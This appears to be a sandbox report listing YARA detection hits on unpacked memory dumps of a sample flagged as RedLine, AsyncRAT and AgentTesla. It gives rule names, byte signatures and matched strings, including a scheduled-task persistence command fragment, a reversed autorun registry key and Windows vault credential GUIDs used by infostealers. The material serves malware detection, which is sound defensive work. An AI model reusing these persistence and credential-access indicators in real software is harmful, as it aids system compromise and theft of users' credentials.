9.2.vokleakA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
9.1.vokleakA.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.1.vokleakA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
4.2.vokleakA.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.vokleakA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.vokleakA.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.vokleakA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.1.vokleakA.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.1.vokleakA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
4.2.vokleakA.pif.3305d590.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.3305d590.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.3305d590.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.3305d590.5.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
4.2.vokleakA.pif.3305d590.5.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.3305d590.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.284a0000.7.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.284a0000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.284a0000.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.284a0000.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.284a0000.7.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
7.2.vokleakA.pif.284a0000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.284a0000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.31b94ec6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.26fc6458.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.26fc6458.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.26fc6458.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.26fc6458.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.26fc6458.4.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9e787:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0xad170:$a2: Stub.exe 0xad200:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x95a04:$a3: get_ActivatePong 0x47867:$a4: vmware 0x9e99f:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9e817:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient 0x95929:$a6: get_SslClient
7.2.vokleakA.pif.26fc6458.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9e819:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.26fc6458.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x9f3f8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x9f46a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x9f4f4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x9f586:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9f5f0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x9f662:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x9f6f8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x9f788:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.26fc5570.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.26fc5570.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.26fc5570.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.26fc5570.3.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
7.2.vokleakA.pif.26fc5570.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.26fc5570.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.32f4d590.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.32f4d590.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.32f4d590.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.32f4d590.4.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
9.2.vokleakA.pif.32f4d590.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.32f4d590.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.2701d590.5.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.2701d590.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.2701d590.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.2701d590.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.2701d590.5.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
7.2.vokleakA.pif.2701d590.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.2701d590.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.32ef6458.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.32ef6458.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.32ef6458.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.32ef6458.3.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
9.2.vokleakA.pif.32ef6458.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.32ef6458.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.26fc5570.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.34490ee8.7.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.26fc5570.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.26fc5570.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.26fc5570.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.34490ee8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.34490ee8.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.26fc5570.3.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9f66f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0xae058:$a2: Stub.exe 0xae0e8:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x968ec:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x9f887:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9f6ff:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient 0x96811:$a6: get_SslClient
9.2.vokleakA.pif.34490ee8.7.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
7.2.vokleakA.pif.26fc5570.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9f701:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.26fc5570.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa02e0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa0352:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa03dc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa046e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa04d8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa054a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa05e0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0xa0670:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.34490ee8.7.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.34490ee8.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.34c30000.8.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.34c30000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.34c30000.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.34c30000.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.34c30000.8.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
4.2.vokleakA.pif.34c30000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.34c30000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.3.vokleakA.pif.2436fa40.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.3.vokleakA.pif.2436fa40.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.vokleakA.pif.2436fa40.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.3.vokleakA.pif.2436fa40.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
